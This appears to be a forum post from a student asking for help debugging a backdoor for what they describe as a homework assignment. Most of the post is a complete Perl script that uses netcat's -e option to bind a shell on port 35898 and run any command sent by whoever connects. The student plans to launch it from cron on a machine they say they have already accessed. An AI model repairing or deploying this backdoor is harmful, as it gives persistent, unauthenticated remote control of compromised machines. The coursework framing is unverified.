We have been asked to set up a backdoor in a victim machine for a homework assignment. I’ve gained access to the machine and I want to have the following script run on a cron, but it’s throwing an error.

I’ve verified that the @ARGV test works correctly by calling the program independently with and without the dummy run argument, but when I try and netcat into the victim machine on port 35898 after initializing the script, the following error is all I get on connection.

Error: exec /bin/vshell run failed : No such file or directory

Obviously the program exists because the program is calling itself.

Code:

#!/usr/bin/perl -w

$| = 1;
my $prompt = '$ ';

# run is just a dummy arg
if(!@ARGV){ exec("nc -e '/bin/vshell run' -l -p 35898"); die; }

while(1){
  print $prompt;
  eval {
    local $SIG{ALRM} = sub { die 'Goodbye!\n'; };

    alarm 60;
    &syscall;
    alarm 0;
  };
  if( $@ ){ die; }
}

sub syscall{
  if( defined( $_ = <STDIN> )){
    chomp;
    system( $_ );
  }
}

I’ve been at this for a while and I could really use a nudge in the right direction. Thanks!

PS: This install of nc is compiled with the security hole which allows the -e flag and I have verified this functionality on other programs.